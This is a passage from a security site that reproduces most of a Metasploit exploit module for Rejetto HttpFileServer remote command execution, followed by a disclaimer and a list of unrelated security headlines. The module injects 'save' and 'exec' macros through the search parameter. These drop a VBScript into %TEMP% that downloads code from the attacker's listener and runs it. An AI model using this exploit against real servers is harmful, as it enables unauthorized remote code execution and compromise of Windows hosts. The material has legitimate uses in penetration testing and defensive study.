['OSVDB', '111386'],
['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']
],
'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
],
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DisclosureDate' => "Sep 11 2014",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),
], self.class)
end

def check
res = send_request_raw({
'method' => 'GET',
'uri' => '/'
})

if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\d.]+)/
version = $1
if Gem::Version.new(version) <= Gem::Version.new("2.3")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end
end

def on_request_uri(cli, req)
print_status("#{peer} - Payload request received: #{req.uri}")
exe = generate_payload_exe
vbs = Msf::Util::EXE.to_exe_vbs(exe)
send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
# remove resource after serving 1st request as 'exec' execute 4x
# during exploitation
remove_resource(get_resource)
end

def primer
file_name = rand_text_alpha(rand(10)+5)
file_ext = '.vbs'
file_full_name = file_name + file_ext
vbs_path = "%TEMP%\\#{file_full_name}"

vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a"
vbs_code << "On Error Resume Next\x0d\x0a"
vbs_code << "x.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0a"
vbs_code << "If Err.Number <> 0 Then\x0d\x0a"
vbs_code << "wsh.exit\x0d\x0a"
vbs_code << "End If\x0d\x0a"
vbs_code << "x.Send\x0d\x0a"
vbs_code << "Execute x.responseText"

payloads = [
"save|#{vbs_path}|#{vbs_code}",
"exec|wscript.exe //B //NOLOGO #{vbs_path}"
]

print_status("Sending a malicious request to #{target_uri.path}")
payloads.each do |payload|
send_request_raw({
'method' => 'GET',
'uri' => "/?search={.#{URI::encode(payload)}.}"
})
end
register_file_for_cleanup(vbs_path)
end

def exploit
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
# When the server stops due to our timeout, this is raised
end
end
end

//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

[Onapsis Security Advisory 2014-033] SAP Business Warehouse Missing Authorization Check

[Onapsis Security Advisory 2014-031] SAP Business Objects Information Disclosure via CORBA

[Onapsis Security Advisory 2014-027] SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities

[Onapsis Security Advisory 2014-028] SAP HANA Web-based Development Workbench Code Injection

[Onapsis Security Advisory 2014-030] SAP Business Objects Denial of Service via CORBA

[Onapsis Security Advisory 2014-032] SAP BusinessObjects Persistent Cross Site Scripting

[Onapsis Security Advisory 2014-029] SAP Business Objects Information Disclosure

Twitter Sues DOJ to Open Up Data Request Disclosures

Cuckoo Sandbox Evasion PoC available

Sednit espionage group now using custom exploit kit

Timestomp MFT Shenanigans

Tsunami SYN Flood Attack – A New Trend in DDoS Attacks?

FBI Pays Visit to Researcher Who Revealed Yahoo Hack

SPHINCS: practical stateless hash-based signatures

Multiple Vulnerabilities in Cisco ASA Software

The Horror of a 'Secure Golden Key'

The malware of the future may come bearing real gifts

Metasploit: F5 iControl Remote Root Command Execution

Metasploit: Wordpress InfusionSoft Plugin Upload Vulnerability

Metasploit: Rejetto HttpFileServer Remote Command Execution